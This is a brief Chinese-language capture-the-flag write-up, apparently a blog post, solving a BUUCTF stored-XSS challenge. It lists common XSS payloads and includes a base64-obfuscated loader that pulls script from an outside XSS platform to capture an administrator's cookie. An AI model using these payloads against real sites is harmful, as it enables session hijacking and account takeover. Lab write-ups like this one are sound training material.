进入靶场
左边是吐槽,右边是登录,先登录试试
admin 123456
admiin'# 123456
admin"# 123456
不玩了,先去回顾下xss
回顾完就很尴尬了,我居然用SQL的知识去做xss的题
重来
吐槽这里有一个输入框,容易出现存储型xss漏洞
常见的xss payload如下:
<script>alert(1)</script>
"><script>alert(1)</script><"
<img src=# one rror=alert(1)>
<svg onl oad=alert(1)>
都试试
1,<script>alert(1)</script>
访问的时候什么都没有,失败
2,"><script>alert(1)</script><"
根据以上两次尝试,知script被过滤了
3,<img src=# one rror=alert(1)>
出现弹窗1,注入成功
进入xss测试平台XSS平台-XSS测试网站-仅用于安全免费测试
之前没用过,先注册
登录成功
点击左边的创建项目,随便写一个名称
再点击左边的我的项目,右上角的查看配置代码
复制了这个
<img src=c one rror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPScvL3hzLnBlLzV6Vyc7'))>
但是我的xss平台项目里一直不显示记录(很崩溃啊,想换其他的xss平台,结果都被禁了)
不过得到记录后便会知道backend/admin.php和管理员cookie
出现这个页面是我没改cookie
可是我也不知道cookie呀
改cookie就用BP抓包,发送到重放器,在请求里改
就知道flag了
标签:11,XSS,BUUCTF,xss,admin,alert,cookie,123456 From: https://blog.csdn.net/2402_87039650/article/details/145280059